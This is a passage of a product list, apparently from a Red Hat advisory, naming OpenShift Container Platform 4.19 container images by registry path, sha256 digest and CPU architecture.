"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
